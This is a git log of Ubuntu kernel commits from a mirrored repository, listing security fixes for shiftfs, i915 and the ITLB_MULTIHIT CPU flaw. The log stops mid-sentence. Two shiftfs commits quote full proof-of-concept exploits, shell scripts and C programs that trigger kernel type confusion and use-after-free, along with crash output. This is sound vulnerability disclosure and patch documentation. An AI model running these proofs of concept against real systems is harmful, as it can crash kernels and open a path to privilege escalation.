]> git.proxmox.com Git - mirror_ubuntu-eoan-kernel.git/log
mirror_ubuntu-eoan-kernel.git
4 years agoUBUNTU: Ubuntu-5.3.0-23.25
Stefan Bader [Tue, 12 Nov 2019 08:46:03 +0000 (09:46 +0100)]
UBUNTU: Ubuntu-5.3.0-23.25

Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: drm/i915/cmdparser: Fix jump whitelist clearing
Ben Hutchings [Sun, 10 Nov 2019 22:38:00 +0000 (22:38 +0000)]
UBUNTU: SAUCE: drm/i915/cmdparser: Fix jump whitelist clearing

BugLink: https://launchpad.net/bugs/1852141
When a jump_whitelist bitmap is reused, it needs to be cleared.
Currently this is done with memset() and the size calculation assumes
bitmaps are made of 32-bit words, not longs.  So on 64-bit
architectures, only the first half of the bitmap is cleared.

If some whitelist bits are carried over between successive batches
submitted on the same context, this will presumably allow embedding
the rogue instructions that we're trying to reject.

Use bitmap_zero() instead, which gets the calculation right.

Fixes: f8c08d8faee5 ("drm/i915/cmdparser: Add support for backward jumps")
Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
CVE-2019-0155

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: Start new release
Stefan Bader [Tue, 12 Nov 2019 08:40:02 +0000 (09:40 +0100)]
UBUNTU: Start new release

Ignore: yes
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: Ubuntu-5.3.0-22.24
Stefan Bader [Sat, 9 Nov 2019 16:11:10 +0000 (17:11 +0100)]
UBUNTU: Ubuntu-5.3.0-22.24

Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoRevert "md/raid0: avoid RAID0 data corruption due to layout confusion."
Stefan Bader [Sat, 9 Nov 2019 11:12:50 +0000 (12:12 +0100)]
Revert "md/raid0: avoid RAID0 data corruption due to layout confusion."

BugLink: https://bugs.launchpad.net/bugs/1849682
This reverts commit b79fb7941cac2c5cd113bcd5695a7c22eaeb9210. That
commit came in via stable but until user-space can handle more
gracefully we have to hold back on it.

Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: shiftfs: Correct id translation for lower fs operations
Seth Forshee [Fri, 1 Nov 2019 18:35:25 +0000 (13:35 -0500)]
UBUNTU: SAUCE: shiftfs: Correct id translation for lower fs operations

BugLink: https://bugs.launchpad.net/bugs/1850867
Several locations which shift ids translate user/group ids before
performing operations in the lower filesystem are translating
them into init_user_ns, whereas they should be translated into
the s_user_ns for the lower filesystem. This will result in using
ids other than the intended ones in the lower fs, which will
likely not map into the shifts s_user_ns.

Change these sites to use shift_k[ug]id() to do a translation
into the s_user_ns of the lower filesystem.

Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15793

Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: shiftfs: prevent type confusion
Christian Brauner [Fri, 1 Nov 2019 13:19:16 +0000 (14:19 +0100)]
UBUNTU: SAUCE: shiftfs: prevent type confusion

BugLink: https://bugs.launchpad.net/bugs/1850867
Verify filesystem type in shiftfs_real_fdget().

Quoting Jann Horn:
 #################### Bug 2: Type confusion ####################

 shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
 passes the resulting file* into shiftfs_real_fdget(), which does this:

 static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
 {
  struct shiftfs_file_info *file_info = file->private_data;
  struct file *realfile = file_info->realfile;

  lowerfd->flags = 0;
  lowerfd->file = realfile;

  /* Did the flags change since open? */
  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
   return shiftfs_change_flags(lowerfd->file, file->f_flags);

  return 0;
 }

 file->private_data is a void* that points to a filesystem-dependent type; and
 some filesystems even use it to store a type-cast number instead of a pointer.
 The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.

 As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
 (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
 offset 0x10), and I use that to cause a memory dereference somewhere around
 0x4242:

 =======================================
 user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
 #!/bin/sh
 sync
 unshare -mUr ./run2.sh
 user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
 #!/bin/sh
 set -e

 mkdir -p mnt/tmpfs
 mkdir -p mnt/shiftfs
 mount -t tmpfs none mnt/tmpfs
 mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
 mount|grep shift
 gcc -o ioctl ioctl.c -Wall
 ./ioctl
 user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
 #include <sys/ioctl.h>
 #include <fcntl.h>
 #include <err.h>
 #include <unistd.h>
 #include <linux/btrfs.h>
 #include <sys/mman.h>

 int main(void) {
   // make our vmacache sequence number something like 0x4242
   for (int i=0; i<0x4242; i++) {
     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
     munmap(x, 0x1000);
   }

   int root = open("mnt/shiftfs", O_RDONLY);
   if (root == -1) err(1, "open shiftfs root");
   int foofd = open("/proc/self/environ", O_RDONLY);
   if (foofd == -1) err(1, "open foofd");
   // trigger the confusion
   struct btrfs_ioctl_vol_args iocarg = {
     .fd = foofd
   };
   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
 }
 user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
 none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
 /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
 [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
 [ 348.105060] #PF: supervisor read access in kernel mode
 [ 348.106573] #PF: error_code(0x0000) - not-present page
 [ 348.108102] PGD 0 P4D 0
 [ 348.108871] Oops: 0000 [#1] SMP PTI
 [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
 [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
 [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
 [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
 [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
 [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
 [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
 [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
 [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
 [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
 [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
 [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
 [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
 [ 348.143545] Call Trace:
 [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
 [ 348.145562] do_vfs_ioctl+0x407/0x670
 [ 348.146620] ? putname+0x4a/0x50
 [ 348.147556] ksys_ioctl+0x67/0x90
 [ 348.148514] __x64_sys_ioctl+0x1a/0x20
 [ 348.149593] do_syscall_64+0x5a/0x130
 [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
 [ 348.152108] RIP: 0033:0x7f77fa76767b
 [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
 [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
 [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
 [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
 [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
 [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
 [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
 [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
 [ 348.188617] CR2: 0000000000004289
 [ 348.189586] ---[ end trace dad859a1db86d660 ]---
 [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
 [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
 [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
 [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
 [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
 [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
 [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
 [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
 [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
 [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 [ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
 [ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
 [ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
 Killed
 user@ubuntu1910vm:~/shiftfs_confuse$

Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
[ saf: use f_op->open instead as special inodes in shiftfs sbs
  will not use shiftfs open f_ops ]
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15792

Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
Seth Forshee [Fri, 1 Nov 2019 15:41:03 +0000 (10:41 -0500)]
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling

BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.

Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.

Original report from Jann Horn:

In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):

 src = fdget(oldfd);
 if (!src.file)
  return -EINVAL;
 // src holds one reference (assuming multithreaded execution)

 ret = shiftfs_real_fdget(src.file, lfd);
 // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
 // extra references
 fdput(src);
 // this drops the only reference we were holding on src, and src was
 // the only thing holding a reference to lfd->file. lfd->file may be
 // dangling at this point.
 if (ret)
  return ret;

 *newfd = get_unused_fd_flags(lfd->file->f_flags);
 if (*newfd < 0) {
  // always a no-op
  fdput(*lfd);
  return *newfd;
 }

 fd_install(*newfd, lfd->file);
 // fd_install() consumes a counted reference, but we don't hold any
 // counted references. so at this point, if lfd->file hasn't been freed
 // yet, its refcount is one lower than it ought to be.

 [...]

 // the following code is refcount-neutral, so the refcount stays one too
 // low.
 if (ret)
  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);

shiftfs_real_fdget() is implemented as follows:

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
 struct shiftfs_file_info *file_info = file->private_data;
 struct file *realfile = file_info->realfile;

 lowerfd->flags = 0;
 lowerfd->file = realfile;

 /* Did the flags change since open? */
 if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
  return shiftfs_change_flags(lowerfd->file, file->f_flags);

 return 0;
}

Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:

=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e

mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c

int main(void) {
  int root = open("mnt/shiftfs", O_RDONLY);
  if (root == -1) err(1, "open shiftfs root");
  int foofd = openat(root, "foo", O_RDONLY);
  if (foofd == -1) err(1, "open foofd");
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
  sleep(1);
  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================

Disassembly of surrounding code:

55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi

This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.

Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791

Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: kvm: x86: mmu: Apply global mitigations knob to ITLB_MULTIHIT
Pawan Gupta [Thu, 31 Oct 2019 04:28:24 +0000 (21:28 -0700)]
UBUNTU: SAUCE: kvm: x86: mmu: Apply global mitigations knob to ITLB_MULTIHIT

Problem: The global mitigation knob mitigations=off does not turn off
X86_BUG_ITLB_MULTIHIT mitigation.

Fix: Turn off the mitigation when ITLB_MULTIHIT mitigation mode is
"auto" and mitigations are turned off globally via cmdline
mitigations=off.

Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
CVE-2018-12207

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: cpu/speculation: Uninline and export CPU mitigations helpers
Tyler Hicks [Fri, 1 Nov 2019 15:21:39 +0000 (15:21 +0000)]
UBUNTU: SAUCE: cpu/speculation: Uninline and export CPU mitigations helpers

A kernel module may need to check the value of the "mitigations=" kernel
command line parameter as part of its setup when the module needs
to perform software mitigations for a CPU flaw. Uninline and export the
helper functions surrounding the cpu_mitigations enum to allow for their
usage from a module. Lastly, privatize the enum and cpu_mitigations
variable since the value of cpu_mitigations can be checked with the
exported helper functions.

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
CVE-2018-12207

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: kvm: x86: mmu: Recovery of shattered NX large pages
Junaid Shahid [Thu, 31 Oct 2019 23:33:47 +0000 (00:33 +0100)]
UBUNTU: SAUCE: kvm: x86: mmu: Recovery of shattered NX large pages

The page table pages corresponding to broken down large pages are
zapped in FIFO order, so that the large page can potentially
be recovered, if it is no longer being used for execution.  This removes
the performance penalty for walking deeper EPT page tables.

By default, one large page will last about one hour once the guest
reaches a steady state.

Signed-off-by: Junaid Shahid <junaids@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
CVE-2018-12207

[tyhicks: Backport to 5.3
 - Context adjustments due to the lack of zapped_obsolete_pages member
   in struct kvm_arch]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: kvm: Add helper function for creating VM worker threads
Junaid Shahid [Thu, 31 Oct 2019 23:33:46 +0000 (00:33 +0100)]
UBUNTU: SAUCE: kvm: Add helper function for creating VM worker threads

This adds a function to create a kernel thread associated with a given
VM. In particular, it ensures that the worker thread inherits the
priority and cgroups of the calling thread.

Signed-off-by: Junaid Shahid <junaids@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
CVE-2018-12207

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: kvm: mmu: ITLB_MULTIHIT mitigation
Paolo Bonzini [Thu, 31 Oct 2019 23:33:45 +0000 (00:33 +0100)]
UBUNTU: SAUCE: kvm: mmu: ITLB_MULTIHIT mitigation

With some Intel processors, putting the same virtual address in the TLB
as both a 4 KiB and 2 MiB page can confuse the instruction fetch unit
and cause the processor to issue a machine check.  Unfortunately if EPT
page tables use huge pages, it possible for a malicious guest to cause
this situation.

This patch adds a knob to mark huge pages as non-executable. When the
nx_huge_pages parameter is enabled (and we are using EPT), all huge pages
are marked as NX. If the guest attempts to execute in one of those pages,
the page is broken down into 4K pages, which are then marked executable.

This is not an issue for shadow paging (except nested EPT), because then
the host is in control of TLB flushes and the problematic situation cannot
happen.  With nested EPT, again the nested guest can cause problems so we
treat shadow and direct EPT the same.

Signed-off-by: Junaid Shahid <junaids@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
CVE-2018-12207

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: x86: Add ITLB_MULTIHIT bug infrastructure
Pawan Gupta [Thu, 31 Oct 2019 23:33:43 +0000 (00:33 +0100)]
UBUNTU: SAUCE: x86: Add ITLB_MULTIHIT bug infrastructure

Some processors may incur a machine check error possibly
resulting in an unrecoverable cpu hang when an instruction fetch
encounters a TLB multi-hit in the instruction TLB. This can occur
when the page size is changed along with either the physical
address or cache type [1].

This issue affects both bare-metal x86 page tables and EPT.

This can be mitigated by either eliminating the use of large
pages or by using careful TLB invalidations when changing the
page size in the page tables.

Just like Spectre, Meltdown, L1TF and MDS, a new bit has been
allocated in MSR_IA32_ARCH_CAPABILITIES (PSCHANGE_MC_NO) and will
be set on CPUs which are mitigated against this issue.

[1] For example please refer to erratum SKL002 in "6th Generation
Intel Processor Family Specification Update"
https://www.intel.com/content/www/us/en/products/docs/processors/core/desktop-6th-gen-core-family-spec-update.html
https://www.google.com/search?q=site:intel.com+SKL002

There are a lot of other affected processors outside of Skylake and
that the erratum(referred above) does not fully disclose the issue
and the impact, both on Skylake and across all the affected CPUs.

Signed-off-by: Vineela Tummalapalli <vineela.tummalapalli@intel.com>
Co-developed-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Pawan Gupta <pawan.kumar.gupta@linux.intel.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
CVE-2018-12207

[tyhicks: Backport to 5.3
 - ATOM_SILVERMONT_D is ATOM_SILVERMONT_X
 - ATOM_AIRMONT_NP does not yet exist
 - ATOM_GOLDMONT_D is ATOM_GOLDMONT_X]
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: SAUCE: KVM: vmx, svm: always run with EFER.NXE=1 when shadow paging is active
Paolo Bonzini [Sun, 27 Oct 2019 15:23:23 +0000 (16:23 +0100)]
UBUNTU: SAUCE: KVM: vmx, svm: always run with EFER.NXE=1 when shadow paging is active

VMX already does so if the host has SMEP, in order to support the combination of
CR0.WP=1 and CR4.SMEP=1.  However, it is perfectly safe to always do so, and in
fact VMX already ends up running with EFER.NXE=1 on old processors that lack the
"load EFER" controls, because it may help avoiding a slow MSR write.  Removing
all the conditionals simplifies the code.

SVM does not have similar code, but it should since recent AMD processors do
support SMEP.  So this patch also makes the code for the two vendors more similar
while fixing NPT=0, CR0.WP=1 and CR4.SMEP=1 on AMD processors.

Cc: stable@vger.kernel.org
Cc: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: Joerg Roedel <jroedel@suse.de>
CVE-2018-12207

Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agokvm: x86, powerpc: do not allow clearing largepages debugfs entry
Paolo Bonzini [Mon, 30 Sep 2019 16:48:44 +0000 (18:48 +0200)]
kvm: x86, powerpc: do not allow clearing largepages debugfs entry

The largepages debugfs entry is incremented/decremented as shadow
pages are created or destroyed.  Clearing it will result in an
underflow, which is harmless to KVM but ugly (and could be
misinterpreted by tools that use debugfs information), so make
this particular statistic read-only.

Cc: kvm-ppc@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
CVE-2018-12207

(cherry picked from commit 833b45de69a6016c4b0cebe6765d526a31a81580)
Signed-off-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
4 years agoUBUNTU: [Config] Disable TSX by default when possible
Tyler Hicks [Wed, 30 Oct 2019 03:28:45 +0000 (03:28 +0000)]
UBUNTU: [Config] Disable TSX by default when possible

Turn on CONFIG_X86_INTEL_TSX_MODE_OFF to disable Intel's Transactional
